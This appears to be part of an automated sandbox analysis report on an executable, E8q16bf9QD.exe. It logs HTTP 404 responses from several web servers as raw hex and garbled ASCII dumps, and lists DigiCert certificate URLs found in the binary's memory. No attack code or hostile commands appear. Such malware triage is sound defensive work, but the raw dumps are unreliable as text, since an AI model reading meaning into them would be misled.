b0 2f a4 d2 23 14 4b a1 41 e8 fb d1 9e 27 7a 73 9f c0 8e c7 40 ec 00 23 2e b8 e6 2c 23 65 cc 32 b8 f7 47 0f 6f 8e 68 9a eb 0c 1e 3e 49 8d 7e 94 5b 91 dc dd 3a 42 4f a2 d4 4f 86 80 7a 9f db 77 df 20 21 55 ce 32 fe 05 bc b8 2c d1 6e e1 51 cf 47 7f a0 8f 3f fd 82 7e e6 31 88 12 d0 1f 68 cd f5 66 bb f2 62 99 df 0a 88 65 c6 ca db e1 bc 77 b7 c6 23 55 c6 05 90 0d f0 f5 46 47 be e7 87 4b b2 87 d5 23 d7 44 c3 41 93 92 7f 01 c2 92 df b7 a5 8e 7c 4a df d6 2b 99 3c 55 39 53 6b 2e 22 5a b3 6a c5 e2 c7 b5 32 f6 93 58 66 52 45 5a 31 51 16 4c 81 d0 75 2c 13 a8 52 29 34 49 59 ce b3 a7 28 97 42 96 05 8b 01 77 4f 4b cb 37 7a 22 1f f2 fa df 1b 9e 24 20 fe 53 25 bc 2c 32 f6 14 09 29 a0 b6 96 f6 81 ca a7 52 43 4e b6 1c 13 56 14 19 10 47 c0 7f c9 b8 78 fc c8 e2 cf 76 f8 a3 14 1a 7f 86 b5 04 f4 af 9f f0 3f e5 4a 6a 89 ff 06 d9 0e 34 8f 19 fa 04 5b c0 df 2b ce 32 fc 49 6a 89 3e 33 51 e2 92 89 92 94 a0 78 8a bf 37 c8 e8 83 79 2d f4 43 2e 7f e7 1d d6 e9 f0 f3 53 be 92 0d 4a 4f 7e 39 74 6e 58 bf c3 11 4b 35 28 1c ad 20 95 0a aa Data Ascii: 821Y_O88`} l>ywr>Mhid3+ES,^oFCr83mt=3_(cb}?1zxBw`{4ChS~/#KA'zs@#.,#e2Goh>I~[:BOOzw !U2,nQG?~1hfbew#UFGK#DA\|J+<U9Sk."Zj2XfREZ1QLu,R)4IY(BwOK7z"$ S%,2)RCNVGxv?Jj4[+2Ij>3Qx7y-C.SJO~9tnXK5(
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 10:06:20 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: no-cache, privatecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0DOyBhJQqu5E9%2FrnDJExdlwjnhxdepyKjgRxGblPc5IsDGBl0IHZlAZB7dfQgSm5GJfxzUb9p4WG6WfpJHMv7wGzlu0XMRzjVV7rq2%2BimJeJBYqlqZ4K46Hcn5I84X1bYN5F"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 930aa12fef7cadac-ATLContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=106274&min_rtt=106274&rtt_var=53137&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=897&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 38 32 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 59 5f 8f e3 b6 11 7f bf 4f c1 38 38 60 7d 20 b5 94 6c d9 3e 79 77 91 f4 9a a0 01 72 d7 a2 97 3e 04 4d 1f 68 69 64 33 2b 91 02 45 ff d9 53 f4 dd 0b 92 92 2c d9 5e ef 1e 90 be d5 8b 85 c5 99 e1 6f 46 43 72 38 33 be fb e6 af 7f ff f0 cb af ff f8 01 6d 74 9e 3d bc b9 33 5f 28 63 62 7d 3f 02 31 7a 78 83 10 42 77 1b 60 89 7b b4 c3 1c 34 43 f1 86 a9 12 f4 fd 68 ab 53 b2 18 9d b2 05 cb e1 7e b4 e3 b0 2f a4 d2 23 14 4b a1 41 e8 fb d1 9e 27 7a 73 9f c0 8e c7 40 ec 00 23 2e b8 e6 2c 23 65 cc 32 b8 f7 47 0f 6f 8e 68 9a eb 0c 1e 3e 49 8d 7e 94 5b 91 dc dd 3a 42 4f a2 d4 4f 86 80 7a 9f db 77 df 20 21 55 ce 32 fe 05 bc b8 2c d1 6e e1 51 cf 47 7f a0 8f 3f fd 82 7e e6 31 88 12 d0 1f 68 cd f5 66 bb f2 62 99 df 0a 88 65 c6 ca db e1 bc 77 b7 c6 23 55 c6 05 90 0d f0 f5 46 47 be e7 87 4b b2 87 d5 23 d7 44 c3 41 93 92 7f 01 c2 92 df b7 a5 8e 7c 4a df d6 2b 99 3c 55 39 53 6b 2e 22 5a b3 6a c5 e2 c7 b5 32 f6 93 58 66 52 45 5a 31 51 16 4c 81 d0 75 2c 13 a8 52 29 34 49 59 ce b3 a7 28 97 42 96 05 8b 01 77 4f 4b cb 37 7a 22 1f f2 fa df 1b 9e 24 20 fe 53 25 bc 2c 32 f6 14 09 29 a0 b6 96 f6 81 ca a7 52 43 4e b6 1c 13 56 14 19 10 47 c0 7f c9 b8 78 fc c8 e2 cf 76 f8 a3 14 1a 7f 86 b5 04 f4 af 9f f0 3f e5 4a 6a 89 ff 06 d9 0e 34 8f 19 fa 04 5b c0 df 2b ce 32 fc 49 6a 89 3e 33 51 e2 92 89 92 94 a0 78 8a bf 37 c8 e8 83 79 2d f4 43 2e 7f e7 1d d6 e9 f0 f3 53 be 92 0d 4a 4f 7e 39 74 6e 58 bf c3 11 4b 35 28 1c ad 20 95 0a aa 95 3c 98 77 e7 62 Data Ascii: 82cY_O88`} l>ywr>Mhid3+ES,^oFCr83mt=3_(cb}?1zxBw`{4ChS~/#KA'zs@#.,#e2Goh>I~[:BOOzw !U2,nQG?~1hfbew#UFGK#DA\|J+<U9Sk."Zj2XfREZ1QLu,R)4IY(BwOK7z"$ S%,2)RCNVGxv?Jj4[+2Ij>3Qx7y-C.SJO~9tnXK5( <wb
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 10:06:23 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: no-cache, privatecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iuy129bZpSu2I0Pd75bNK05N3DpNpx79w%2FX1c7h5tupB4eGhzKg8qYiRxE5aM0fv%2Fr20jQzYlHoDXO9EmpkilDBDDvAKEuRMQgjZqRQUmnoIJlBIBMAQT2hn%2BYkQb%2Bkf8c3L"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 930aa14158d1ade7-ATLalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=106048&min_rtt=106048&rtt_var=53024&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=456&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 39 63 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 21 20 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 76 38 2e 30 2e 31 20 7c 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 7c 20 67 69 74 68 75 62 2e 63 6f 6d 2f 6e 65 63 6f 6c 61 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 2a 2f 68 74 6d 6c 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 35 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 7d 61 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 63 6f 64 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6d 6f 6e 6f 73 70 61 63 65 2c 6d 6f 6e 6f 73 70 61 63 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 7d 5b 68 69 64 64 65 6e 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 79 73 74 65 6d 2d 75 69 2c 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 42 6c 69 6e Data Ascii: 19cb<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Not Found</title> <style> /! normalize.css v8.0.1 \| MIT License \| github.com/necolas/normalize.css /html{line-height:1.15;-webkit-text-size-adjust:100%}body{margin:0}a{background-color:transparent}code{font-family:monospace,monospace;font-size:1em}[hidden]{display:none}html{font-family:system-ui,-apple-system,Blin
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 10:06:43 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wt4ukWnG5sn4qAXJ3AMUHxn4P%2FV4%2FPgzLQFiZaytfUs6NaUe%2B2D40oYssdJS%2FYft%2FvvNj3F%2BVy2U3%2B%2BCJ9rMMzu4wAt69isu85fmNt9NDp4%2ByXmfg4HJn%2BsYXd6DBHmNFaKwHU58"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 930aa1bbce09b074-ATLContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=106340&min_rtt=106340&rtt_var=53170&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=722&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 10:06:45 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RAliruYcDACe4yR5j1z3uazQHmP%2BpchzqPZPzbfsF87u4WEQZh8mzSpmmHoywilXRZ8Jqu2JSpU0vb8TFukX6V0t2mTFSeY9%2FE5dQYbNrCbfyhb5u1iOBVItKa892hI69cymTiTB"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 930aa1cc6995b0e8-ATLContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=106061&min_rtt=106061&rtt_var=53030&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=746&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 10:06:48 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CX%2FB6M%2BkoS7eDfr8%2FKm73eGDbb4IaLioaKj5jbeHYSFh7%2Fte09tpjqxrxACsDmuFGLToJPCAHJRpYXo7ZWOvQn9Gv3V%2BvXAxq34aLR3kFFmAfOm%2FXWad344%2BR7rD0JSmR%2Blgjxor"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 930aa1dcfbbebcfc-ATLContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=106763&min_rtt=106763&rtt_var=53381&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=906&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 10:06:50 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: max-age=43200CF-Cache-Status: MISSReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UpNh%2FblhbafzmhiJY3uqw0JJPEkENHlUwHDH4bWjWP9FyDcVUivpHwyFA353FwkcuAVmiMiT9965g7ZifBI%2F5LFAOgAkbiIvlnAlWVxD24gSrfaB0KAjSaIyGQzsLS628nTYIouS"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 930aa1ed7e591d80-ATLalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=106056&min_rtt=106056&rtt_var=53028&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=459&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 10:07:18 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 10:07:21 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 10:07:24 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 10:07:26 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Source: E8q16bf9QD.exe, 00000000.00000002.1162124173.0000000021406000.00000004.00001000.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1103236866.0000000021541000.00000004.00000020.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1103658560.000000007EED0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: E8q16bf9QD.exe, 00000000.00000002.1162124173.0000000021406000.00000004.00001000.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1103236866.0000000021541000.00000004.00000020.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1103658560.000000007EED0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: E8q16bf9QD.exe, 00000000.00000002.1162124173.0000000021406000.00000004.00001000.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1103236866.0000000021541000.00000004.00000020.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1103658560.000000007EED0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: E8q16bf9QD.exe, 00000000.00000002.1162124173.0000000021406000.00000004.00001000.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1103236866.0000000021541000.00000004.00000020.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1103658560.000000007EED0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
